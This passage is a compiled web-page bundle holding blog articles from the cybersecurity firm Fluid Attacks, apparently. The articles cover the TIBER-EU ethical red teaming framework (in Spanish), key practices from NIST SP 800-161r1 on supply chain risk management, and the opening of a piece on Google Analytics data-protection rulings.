certificaciones que puede obtener un miembro de un \",/*#__PURE__*/e(\"em\",{children:\"red team\"}),\" son m\\xfaltiples. TIBER-EU sugiere algunas de ellas que podr\\xedan estar entre las que certifiquen al equipo del proveedor de RT. Por supuesto, cuantas m\\xe1s tengan, mejor. Adem\\xe1s de destacar varias certificaciones de \",/*#__PURE__*/e(o,{href:\"https://www.giac.org/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"GIAC\"})}),\" y \",/*#__PURE__*/e(o,{href:\"https://www.offensive-security.com/courses-and-certifications/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"Offensive Security\"})}),\", mencionan la eLearnSecurity Certified Professional Penetration Tester (eCPPT) y la Certified Ethical Hacker (CEH), entre otras. En Fluid Attacks, tenemos algunas de estas y m\\xe1s. Recientemente hemos incluido en \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/certifications/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"nuestra lista de certificaciones\"})}),\" varias de \",/*#__PURE__*/e(o,{href:\"https://www.mile2.com/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"Mile2\"})}),\". Estrechamente asociadas al \",/*#__PURE__*/e(\"em\",{children:\"red teaming\"}),\", tenemos, por ejemplo: la Certified Red Team Operator, la Certified Red Teaming Expert y la Certified Red Team Professional.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Una vez m\\xe1s, el cumplimiento de los requisitos por parte del proveedor es algo que la entidad o los organismos de acreditaci\\xf3n y certificaci\\xf3n deben verificar antes de iniciar la prueba TIBER-EU. Tres de los criterios m\\xe1s importantes para un comprador de servicios de pruebas de \",/*#__PURE__*/e(\"em\",{children:\"red team\"}),\" son la reputaci\\xf3n y el historial del proveedor de RT y la conducta \\xe9tica que adopta y hace cumplir. La entidad necesita encontrar en el proveedor un plan adecuado de gesti\\xf3n de riesgos y confidencialidad. Este \\xfaltimo debe ofrecer metodolog\\xedas avanzadas, innovadoras y de alta calidad. Todo ello, con la expectativa de una simulaci\\xf3n adecuada de ataques reales contra la entidad como objetivo global.\"]}),/*#__PURE__*/t(\"p\",{children:[\"El \",/*#__PURE__*/e(\"em\",{children:\"red teaming\"}),\" eval\\xfaa a las organizaciones y sus estrategias de mitigaci\\xf3n de riesgos, detecci\\xf3n y respuesta ante amenazas y resiliencia. Tambi\\xe9n identifica sus debilidades y vulnerabilidades para que las corrijan y mejoren sus medidas preventivas. Aunque TIBER-EU es una iniciativa para proyectos con entidades europeas, puede servir de referencia para muchos en todo el mundo. Tanto para quienes ofrecemos servicios como los mencionados, como para quienes los requieren. Fluid Attacks, por ejemplo, es un \",/*#__PURE__*/e(\"em\",{children:\"red team\"}),\" altamente experimentado y cualificado que puede actuar en favor de la ciberseguridad de tu organizaci\\xf3n. Te invitamos a descubrirlo. \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/es/contactanos/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"\\xa1Cont\\xe1ctanos!\"})})]})]});export const richText5=/*#__PURE__*/t(r.Fragment,{children:[/*#__PURE__*/t(\"p\",{children:[\"One year ago, the U.S. President's \",/*#__PURE__*/e(o,{href:\"https://www.federalregister.gov/documents/2021/05/17/2021-10460/improving-the-nations-cybersecurity\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"Executive Order 14028\"})}),\" on improving the nation's cybersecurity included enhancing software supply chain security as one of its items. The directive followed the \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/solarwinds-attack/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"SolarWinds\"})}),\" and \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/exchange-server-hack/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"Microsoft Exchange Server\"})}),\" incidents. But the threat of supply chain attacks still holds to this day, mainly for managed service providers (MSP). These firms deliver, operate or manage information and communications technology (ICT) services to other firms. In fact, last week, the Cybersecurity and Infrastructure Security Agency (CISA), along with other cyber intelligence agencies of the U.S., Canada, the U.K., Australia and New Zealand, \",/*#__PURE__*/e(o,{href:\"https://www.cisa.gov/news/2022/05/11/joint-cybersecurity-advisory-protect-msp-providers-and-customers\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"posted\"})}),\" actions that MSPs should take to improve resilience of the global supply chain.\"]}),/*#__PURE__*/t(\"p\",{children:[\"In the Executive Order, the National Institute of Standards and Technology (NIST) was asked to solicit input from different sectors, like government agencies, private firms and academia, to identify practices that could enhance the security of the software supply chain. What is more, it was responsible for issuing preliminary guidelines, which it did in November last year. And early this month, it issued an update on the \",/*#__PURE__*/e(\"em\",{children:\"Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations\"}),\" (\",/*#__PURE__*/e(o,{href:\"https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1.pdf\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:/*#__PURE__*/e(\"em\",{children:\"NIST Special Publication 800-161 Revision 1\"})})}),\").\"]}),/*#__PURE__*/e(\"p\",{children:\"Let's consider the supplier relationship: How one supplier gets components for their solution from other suppliers, and so on. We can tell that each acquiring organization loses visibility, understanding and control of its supply chain. As they rely more and more on third-party components to build their technology, they need to become aware of the risk and assess the security of each of their system components. So, in this blog post, we will give you some of the key takeaways from the NIST publication.\"}),/*#__PURE__*/e(\"img\",{alt:\"NIST - Organization's reduced visibility\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/8gmN26AmgeHKMWmGKzwG2dOda5s.png\",srcSet:\"https://framerusercontent.com/images/8gmN26AmgeHKMWmGKzwG2dOda5s.png?scale-down-to=512 512w,https://framerusercontent.com/images/8gmN26AmgeHKMWmGKzwG2dOda5s.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/8gmN26AmgeHKMWmGKzwG2dOda5s.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/t(\"h6\",{children:[\"The NIST's depiction of an organization's reduced visibility, understanding and control of its supply chain. Taken from \",/*#__PURE__*/e(o,{href:\"https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1.pdf\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"nvlpubs.nist.gov\"})}),\".\"]})]});export const richText6=/*#__PURE__*/t(r.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"A matter entwined with enterprise risk management\"}),/*#__PURE__*/e(\"p\",{children:\"One major step that every organization must take is to place cybersecurity on the boardroom agenda. This will make it possible for cybersecurity supply chain risk management (C-SCRM) to be effectively addressed. Indeed, one of the challenges is to put the issue, responsibilities and activities in terms that are understandable for everyone. The NIST aims to do this in the introduction by suggesting what sections personnel at the executive, management or practitioner level should read.\"}),/*#__PURE__*/e(\"p\",{children:\"The contribution of some personnel to C-SCRM is expected. For example, developers are responsible for identifying issues in software and fixing them at early stages, and engineers for designing products and understanding requirements for open-source components. But the publication recommends that everyone be aware of the supply chain risk and linked policies and receive C-SCRM-related training.\"}),/*#__PURE__*/t(\"p\",{children:[\"In addition to trying to reach out to a vast public, this publication acknowledges that C-SCRM is a big issue to solve which affects the entire enterprise. And that is why the NIST maps it to the overall enterprise risk management function. Then, the supply chain risk needs to be monitored, quantitatively measured and also be included in the firm's \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/incident-response-plan/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"incident response plan\"})}),\".\"]}),/*#__PURE__*/e(\"p\",{children:\"And one more important piece of advice in this publication is for organizations to have policies on acquiring systems from the supply chain into their production environment. For this, they need to have steering committees for C-SCRM to decide what is acceptable. What different committees, who could be on them and what they would be responsible for can be defined drawing inspiration from Table 2-1 in the publication. It shows the generic stakeholders at each level and their activities.\"}),/*#__PURE__*/e(\"h2\",{children:\"NIST supply chain key practices\"}),/*#__PURE__*/e(\"p\",{children:\"Now, on to the actual key practices that the NIST describes in their publication. They are broken down into three categories and arranged in ascending order according to their level of maturity. Here, we summarize a few selected items that connect to the previously mentioned highlights. However, you can find all the practices in the publication in section 3.4.\"}),/*#__PURE__*/e(\"h3\",{children:\"Foundational practices\"}),/*#__PURE__*/e(\"p\",{children:\"At a base level, we have actions that aim towards building a C-SCRM practicing capability. They include the following:\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Obtaining senior leadership support for establishing C-SCRM.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Implementing a risk management hierarchy and process.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Developing a process to measure the criticality of the organization's suppliers, products and services.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Integrating C-SCRM into products and services acquisition policies.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Using supplier risk-assessment processes and threat and vulnerability analyses.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Monitoring components of embedded software.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Implementing quality assurance and quality control processes.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Establishing internal checks to ensure compliance with security requirements.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Implementing an incident response plan.\"})})]}),/*#__PURE__*/e(\"h3\",{children:\"Sustaining practices\"}),/*#__PURE__*/e(\"p\",{children:\"These are more advanced actions that revolve around how organizations can mature processes mentioned in the previous segment. The practices at this level include the following:\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"Assessing the supplier's security capabilities and practices by looking at formal certifications (e.g., \",/*#__PURE__*/e(o,{href:\"https://help.fluidattacks.com/portal/en/kb/articles/criteria-compliance-iso27001\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"ISO27001\"})}),\"), among other things.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Continuously monitoring changes to the risk profile of the supplied products and services and the supply chain itself.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Integrating C-SCRM requirements into contractual agreements with suppliers, developers, MSPs, etc.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Involving critical suppliers in the incident response plan.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Engaging with various agents, like suppliers and stakeholders, to improve their cybersecurity practices.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Collecting C-SCRM metrics.\"})})]}),/*#__PURE__*/e(\"h3\",{children:\"Enhancing practices\"}),/*#__PURE__*/e(\"p\",{children:\"These actions basically refer to the use of automation. They include the following:\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Automating C-SCRM processes.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Analyzing risk quantitatively with probabilistic approaches to find out the likelihood and impact of cybersecurity issues throughout the supply chain.\"})})]}),/*#__PURE__*/e(\"h2\",{children:\"Know what's in your software\"}),/*#__PURE__*/t(\"p\",{children:[\"Additionally to the practices summarized above, our advice at Fluid Attacks is to \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/what-is-vulnerability-management/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"search for vulnerabilities\"})}),\" in your software third-party components and your own code throughout the entire software development lifecycle. Our automated and manual \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/product/sca/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"software composition analysis\"})}),\" helps you identify issues that you can fix to prevent falling victim to supply chain attacks. Want to know more? \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/contact-us/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"Contact us\"})}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"_____\",/*#__PURE__*/e(\"br\",{}),/*#__PURE__*/e(\"br\",{}),\"⚠️ \",/*#__PURE__*/e(\"strong\",{children:\" \"}),/*#__PURE__*/t(\"em\",{children:[/*#__PURE__*/e(\"strong\",{children:\"Caution:\"}),\" Many major details from the NIST publication are missing in this blog post. Having read this post in no way substitutes for careful reading of the NIST SP 800-161r1. For a thorough understanding of the guidelines, we recommend reading the \"]}),/*#__PURE__*/e(o,{href:\"https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1.pdf\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:/*#__PURE__*/e(\"em\",{children:\"original text\"})})}),/*#__PURE__*/t(\"em\",{children:[\".\",/*#__PURE__*/t(\"strong\",{children:[/*#__PURE__*/e(\"br\",{}),/*#__PURE__*/e(\"br\",{})]})]}),\"_____\"]})]});export const richText7=/*#__PURE__*/t(r.Fragment,{children:[/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(o,{href:\"https://www.ecb.europa.eu/ecb/history/html/index.es.html\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"En 1988\"})}),\", algunos pa\\xedses europeos decidieron crear una uni\\xf3n econ\\xf3mica que permitiera la libre circulaci\\xf3n de capitales entre ellos y tuviera una autoridad compartida y una pol\\xedtica monetaria \\xfanica. A\\xf1os m\\xe1s tarde, definieron y adoptaron una moneda com\\xfan, el euro, que surgi\\xf3 junto con la \",/*#__PURE__*/e(o,{href:\"https://es.wikipedia.org/wiki/Eurozona\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"eurozona\"})}),\", que ahora incluye a 19 de los 27 pa\\xedses miembros de la Uni\\xf3n Europea (UE). Hoy, la instituci\\xf3n que rige esa moneda es el Banco Central Europeo (BCE). Es sobre una iniciativa relacionada con la ciberseguridad dentro de esta organizaci\\xf3n de lo que hablaremos en este art\\xedculo del blog.\"]}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(o,{href:\"https://www.ecb.europa.eu/ecb/html/index.es.html\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"Adem\\xe1s de\"})}),\" ayudar a mantener estables los precios en la eurozona, el BCE realiza importantes esfuerzos para contribuir a la seguridad de la banca europea \",/*#__PURE__*/e(o,{href:\"https://www.ecb.europa.eu/ecb/educational/explainers/tell-me-more/html/anniversary.es.html\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"Desde 2014\"})}),\", supervisa la solidez y resistencia de los bancos de la zona, exigi\\xe9ndoles que realicen ajustes siempre que aparezca alguna irregularidad. En el contexto digital, el BCE busca firmemente proteger el dinero de los usuarios frente a las ciberamenazas y act\\xfaa de forma preventiva con la comunidad financiera. En concreto, ponen a prueba la seguridad y la ciberresiliencia de sus entidades. \",/*#__PURE__*/e(o,{href:\"https://www.ecb.europa.eu/paym/cyber-resilience/html/index.en.html\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"Como ellos dicen\"})}),\", la ciberresiliencia se refiere a la capacidad de proteger los datos y sistemas electr\\xf3nicos de los ciberataques, as\\xed como de reanudar r\\xe1pidamente las operaciones comerciales en caso de que un ataque tenga \\xe9xito. Esta ciberresiliencia la ponen a prueba con la ayuda de \",/*#__PURE__*/e(\"em\",{children:\"pentesters\"}),\" o \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/es/blog/que-es-hacking-etico/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/t(a.a,{children:[/*#__PURE__*/e(\"em\",{children:\"hackers\"}),\" \\xe9ticos\"]})}),\", siguiendo procedimientos que se basan en el \",/*#__PURE__*/e(o,{href:\"https://www.ecb.europa.eu/paym/cyber-resilience/tiber-eu/html/index.en.html\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"TIBER-EU\"})}),\".\"]})]});export const richText8=/*#__PURE__*/t(r.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"\\xbfQu\\xe9 es TIBER-EU y c\\xf3mo funciona?\"}),/*#__PURE__*/t(\"p\",{children:[\"El TIBER-EU (Threat Intelligence-based Ethical Red Teaming) es un marco com\\xfan desarrollado por los bancos centrales nacionales de la UE y el BCE, publicado en 2018. Este, orienta a las autoridades, entidades y proveedores de inteligencia de amenazas (TI por sus iniciales en ingl\\xe9s) y \",/*#__PURE__*/e(\"em\",{children:\"red teaming\"}),\" (RT) en ciberataques controlados y en la mejora de la ciberresiliencia de las entidades. Siguiendo el enfoque de \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/es/cybersecurity-essentials/que-es-red-teaming\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/t(a.a,{children:[\"un \",/*#__PURE__*/e(\"em\",{children:\"red team\"})]})}),\", como el de Fluid Attacks, sus pruebas buscan imitar las t\\xe1cticas, t\\xe9cnicas y procedimientos de los atacantes maliciosos. Pretenden \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/what-is-breach-attack-simulation/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"simular ataques reales\"})}),\" a los sistemas de sus entidades, especialmente a sus operaciones cr\\xedticas, para determinar sus debilidades y fortalezas e impulsar as\\xed el crecimiento de su nivel de madurez en ciberseguridad. (Esto nos recuerda al \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.docsend.com/view/4k524b3gviwqubri\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"SAMM de OWASP\"})}),\", que puedes emplear, por ejemplo, para evaluar la madurez de tus pruebas de seguridad.)\"]}),/*#__PURE__*/t(\"p\",{children:[\"En las pruebas TIBER-EU participan varios equipos. Del lado de la entidad (generalmente del sector financiero) que va a ser evaluada est\\xe1n los equipos azul y blanco. El primero es el que desconoce que va a ser objeto de ataques simulados destinados a evaluar sus capacidades de prevenci\\xf3n, detecci\\xf3n y respuesta. El segundo es un grupo reducido de personas que conoce acerca del procedimiento y contribuye a su ejecuci\\xf3n. Por otro lado, est\\xe1n los proveedores de TI y RT. La primera empresa analiza el espectro de amenazas potenciales y realiza un reconocimiento de la entidad. La segunda empresa se encarga del \",/*#__PURE__*/e(\"em\",{children:\"hacking\"}),\" \\xe9tico o ataques deliberados contra los sistemas de la entidad y sus operaciones cr\\xedticas. Por \\xfaltimo, est\\xe1 el equipo cibern\\xe9tico TIBER. Este grupo pertenece a la autoridad y se encarga de la supervisi\\xf3n de la prueba para garantizar el cumplimiento de los requisitos del marco.\"]}),/*#__PURE__*/t(\"p\",{children:[\"El TIBER-EU tambi\\xe9n gestiona los requisitos para los proveedores de TI y RT. La entidad a ser examinada debe comprobar que esos requisitos se cumplen antes de trabajar con aquellas empresas. Se trata de \",/*#__PURE__*/e(o,{href:\"https://www.ecb.europa.eu/pub/pdf/other/ecb.1808tiber_eu_framework.en.pdf\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"est\\xe1ndares de selecci\\xf3n\"})}),\" de los que hablaremos en un pr\\xf3ximo art\\xedculo. De momento, conozcamos un poco el \",/*#__PURE__*/e(o,{href:\"https://www.ecb.europa.eu/pub/pdf/other/ecb.tiber_eu_framework.en.pdf\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"procedimiento de las pruebas\"})}),\". Las autoridades de los pa\\xedses europeos, en acuerdo con las entidades bajo su responsabilidad, determinan en qu\\xe9 casos y cu\\xe1ndo llevarlas a cabo. Para ser reconocido como prueba TIBER-EU, este proceso debe ser realizado por proveedores externos independientes y no por los equipos internos de las entidades. El marco estipula que esta prueba debe dividirse en tres fases: preparaci\\xf3n, prueba y cierre.\"]}),/*#__PURE__*/e(\"img\",{alt:\"Fases de TIBER-EU\",className:\"framer-image\",height:\"215\",src:\"https://framerusercontent.com/images/GHSjbHifwashuJlXo76rBEF274.png\",srcSet:\"https://framerusercontent.com/images/GHSjbHifwashuJlXo76rBEF274.png?scale-down-to=512 512w,https://framerusercontent.com/images/GHSjbHifwashuJlXo76rBEF274.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/GHSjbHifwashuJlXo76rBEF274.png 1920w\",style:{aspectRatio:\"1920 / 430\"},width:\"960\"}),/*#__PURE__*/t(\"h6\",{children:[\"Imagen tomada de \",/*#__PURE__*/e(o,{href:\"https://www.ecb.europa.eu/pub/pdf/other/ecb.tiber_eu_framework.en.pdf\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"ecb.europa.eu\"})}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"Antes de la fase de preparaci\\xf3n, TIBER-EU ofrece una fase opcional: el \",/*#__PURE__*/e(\"strong\",{children:\"panorama gen\\xe9rico de amenazas\"}),\". Este paso consiste en realizar una evaluaci\\xf3n gen\\xe9rica del panorama de amenazas del sector financiero nacional. Esto implica mapear el rol de la entidad e identificar a los actuales actores de amenazas de alto nivel para el sector junto con sus m\\xe9todos contra este tipo de entidades. En la \",/*#__PURE__*/e(\"strong\",{children:\"fase de preparaci\\xf3n\"}),\", se definen los equipos responsables de la prueba junto con el alcance de la misma. La autoridad valida lo anterior y la entidad contrata a los proveedores de TI y RT.\"]}),/*#__PURE__*/t(\"p\",{children:[\"En la \",/*#__PURE__*/e(\"strong\",{children:\"fase de prueba\"}),', la empresa de TI elabora un \"Informe de inteligencia sobre amenazas espec\\xedficas\", presentando escenarios de amenazas e informaci\\xf3n relevante sobre la entidad. (El panorama gen\\xe9rico de amenazas de la fase opcional servir\\xeda de base para esta etapa). La empresa de RT utiliza todo esto para desarrollar escenarios de ataque y ejecutar ataques controlados contra determinados sistemas cr\\xedticos de producci\\xf3n, personas y procesos que sustentan las funciones cr\\xedticas de la entidad.']}),/*#__PURE__*/t(\"p\",{children:[\"En la \",/*#__PURE__*/e(\"strong\",{children:\"fase de cierre\"}),', el proveedor de RT ofrece un \"informe de prueba del ',/*#__PURE__*/e(\"em\",{children:\"red team\"}),'\" con detalles de los m\\xe9todos empleados, as\\xed como las hallazgos y evidencias de la prueba. En funci\\xf3n de cada caso, este informe puede incluir recomendaciones para que la entidad sometida a prueba mejore en \\xe1reas como: pol\\xedticas, operaciones, controles o consciencia. Las personas interesadas revisan y debaten la prueba y los problemas descubiertos. Despu\\xe9s, la entidad, que recibe pruebas t\\xe9cnicas detalladas sobre sus puntos d\\xe9biles o vulnerabilidades, acuerda y completa un \"Plan de remediaci\\xf3n\".']}),/*#__PURE__*/e(\"p\",{children:\"Para todos los implicados, debe quedar claro que las pruebas TIBER-EU conllevan riesgos. Por ejemplo, las pruebas pueden dar lugar a p\\xe9rdida, alteraci\\xf3n y divulgaci\\xf3n de datos, ca\\xedda y da\\xf1os al sistema y casos de denegaci\\xf3n de servicio. Por eso el marco TIBER-EU es estricto y da prioridad al establecimiento de controles rigurosos de gesti\\xf3n de riesgos a ser empleados a lo largo de todo el proceso. El marco establece que, para que las pruebas sean seguras, deben definirse y comprenderse adecuadamente los roles y responsabilidades de todas las partes interesadas. Adem\\xe1s, de acuerdo con lo que hemos mencionado antes, y de lo que hablaremos m\\xe1s adelante, los proveedores de TI y RT deben cumplir requisitos espec\\xedficos. Y es que se espera garantizar que solo el personal mejor cualificado realice pruebas tan delicadas en funciones cr\\xedticas.\"}),/*#__PURE__*/t(\"p\",{children:[\"Algo fundamental que hace esta sofisticada y robusta iniciativa es contribuir a proporcionar un nivel de garant\\xeda adecuado de que los activos y sistemas clave de los servicios financieros est\\xe1n protegidos contra ataques de agresores t\\xe9cnicamente competentes, dotados de recursos y de car\\xe1cter persistente. Las autoridades europeas conf\\xedan en las metodolog\\xedas de los proveedores de TI y RT para evaluar la seguridad de sus entidades y reducir los riesgos. \\xbfPor qu\\xe9 ser\\xe1 que tantas organizaciones siguen enfrascadas en confiar \\xfanicamente en herramientas de escaneo automatizadas y poco precisas? Ya lo hemos dicho antes: Para ir un paso adelante de los \",/*#__PURE__*/e(\"em\",{children:\"hackers\"}),\" maliciosos, necesitas a alguien que piense como ellos. Necesitas \",/*#__PURE__*/e(\"em\",{children:\"hackers\"}),\" \\xe9ticos. \\xbfTe gustar\\xeda contar con la ayuda de los \",/*#__PURE__*/e(\"em\",{children:\"hackers\"}),\" \\xe9ticos de Fluid Attacks? \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/es/contactanos/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"\\xa1Cont\\xe1ctanos!\"})})]})]});export const richText9=/*#__PURE__*/t(r.Fragment,{children:[/*#__PURE__*/t(\"p\",{children:[\"In February, \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/google-analytics-illegal/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"we talked about\"})}),\" the case of Google Analytics being illegal in France and Austria. Both the CNIL (\",/*#__PURE__*/e(\"em\",{children:\"Commission Nationale de l'Informatique et des Libert\\xe9s\"}),\") and the DSB (\",/*#__PURE__*/e(\"em\",{children:\"Datenschutzbeh\\xf6rde\"}),\"), the data protection agencies in those countries, found that the web service was sending IP addresses and other identifiers from users in Europe to the U.S., thus breaching the 